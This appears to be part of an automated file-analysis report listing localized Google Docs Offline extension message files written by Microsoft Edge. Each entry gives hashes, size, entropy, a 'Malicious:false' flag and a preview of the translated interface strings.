                                                                                                                                                                                                                                                            SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3235
                                                                                                                                                                                                                                                            Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                            MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                            SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                            SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                            SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3122
                                                                                                                                                                                                                                                            Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                            MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                            SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                            SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                            SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1895
                                                                                                                                                                                                                                                            Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                            MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                            SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                            SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                            SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1042
                                                                                                                                                                                                                                                            Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                            MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                            SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                            SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                            SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2535
                                                                                                                                                                                                                                                            Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                            MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                            SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                            SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                            SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1028
                                                                                                                                                                                                                                                            Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                            MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                            SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                            SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                            SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):994
                                                                                                                                                                                                                                                            Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                            MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                            SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                            SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                            SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2091
                                                                                                                                                                                                                                                            Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                            MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                            SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                            SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                            SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2778
                                                                                                                                                                                                                                                            Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                            MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                            SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                            SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                            SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1719
                                                                                                                                                                                                                                                            Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                            MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                            SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                            SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                            SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):936
                                                                                                                                                                                                                                                            Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                            MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                            SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                            SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                            SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3830
                                                                                                                                                                                                                                                            Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                            MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                            SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                            SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                            SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1898
                                                                                                                                                                                                                                                            Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                            MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                            SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                            SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                            SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):914
                                                                                                                                                                                                                                                            Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                            MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                            SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                            SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                            SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                            Malicious:false
